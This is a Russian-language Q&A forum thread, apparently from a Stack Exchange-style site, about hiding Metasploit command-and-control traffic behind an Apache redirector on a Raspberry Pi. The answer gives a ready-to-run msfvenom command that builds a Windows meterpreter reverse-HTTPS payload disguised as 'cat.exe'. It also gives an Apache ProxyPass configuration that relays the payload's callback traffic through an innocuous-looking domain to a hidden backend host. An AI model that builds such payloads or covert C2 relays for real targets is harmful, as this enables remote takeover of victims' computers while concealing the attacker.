1

Я хотел бы настроить статический веб-сервер Apache, который перенаправляет все входящие соединения Metasploit на другой IP-адрес. Это возможно? Если так, то как? Я хочу запустить сервер Apache на RasPi B+, если это поможет.

1 ответ1

2

Сначала создайте полезную нагрузку:

msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe

Самая важная часть - это LURI, который нужно установить для конкретного ресурса. Весь трафик, генерируемый полезной нагрузкой, будет направлен на этот URI.

После этого используйте директиву ProxyPass в Apache или nginx, чтобы перенаправлять только трафик /myawesomecnc на нужный хост. Вот пример Apache:

<VirtualHost *:443>

  ServerName www.totallyharmless.com
...
  ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/
  ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/
...
</VirtualHost>

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .